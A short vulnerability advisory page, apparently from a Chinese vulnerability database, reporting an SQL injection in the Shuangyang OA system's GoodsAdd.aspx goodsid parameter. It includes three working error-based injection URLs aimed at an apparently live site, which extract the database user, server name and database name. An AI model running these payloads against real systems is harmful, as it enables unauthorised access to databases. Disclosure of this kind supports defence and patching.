|双杨OA系统 /DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞

双杨OA系统 /DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

# 双杨OA系统/DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞 ## 注入参数 goodsid ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=user&flag=2 ``` ![](https://images.seebug.org/contribute/79ad350f-52a5-4ecb-b5cc-8f0fab06fef0-username.png) ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=@@SERVERNAME&flag=2 ``` ![](https://images.seebug.org/contribute/a3514263-672b-4a4c-9808-510872e37054-servername.png) ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=db_name(0)&flag=2 ``` ![](https://images.seebug.org/contribute/93ce36b2-fda1-4a83-ac76-85bc72a7f09a-dbname.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™